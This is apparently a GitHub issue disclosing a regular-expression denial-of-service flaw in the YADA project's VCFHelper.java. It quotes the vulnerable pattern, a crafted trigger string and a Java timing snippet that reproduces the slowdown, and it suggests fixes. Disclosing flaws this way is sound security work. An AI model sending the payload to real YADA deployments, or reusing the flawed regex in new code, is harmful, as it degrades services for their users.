Vulnerable Regular Expressions in YADA

[yetingli]

Type of Issue
Potential Regex Denial of Service (ReDoS)

Description
The vulnerable regular expression is located in

YADA/yada-api/src/main/java/com/novartis/opensource/yada/io/VCFHelper.java

Line 49 in 1b12922

protected final static Pattern H_FIELDS_RX = Pattern.compile("##(INFO|FILTER|FORMAT|ALT)=<((ID|Number|Type|Description)=(\"?.*\"?))+>");

The regex can be exploited with the following string
##INFO=<ID=ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="!

You can execute the following code to reproduce ReDos

        String pattern = "##(INFO|FILTER|FORMAT|ALT)=<((ID|Number|Type|Description)=(\"?.*\"?))+>";
        String content = "##INFO=<ID=ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"!";



        long startTime=System.currentTimeMillis(); 

        Pattern.matches(pattern, content);
        long endTime=System.currentTimeMillis(); 
        System.out.println((endTime-startTime)+"ms");

I am willing to suggest that you limit the input length, modify the regex or replace the regex with other codes.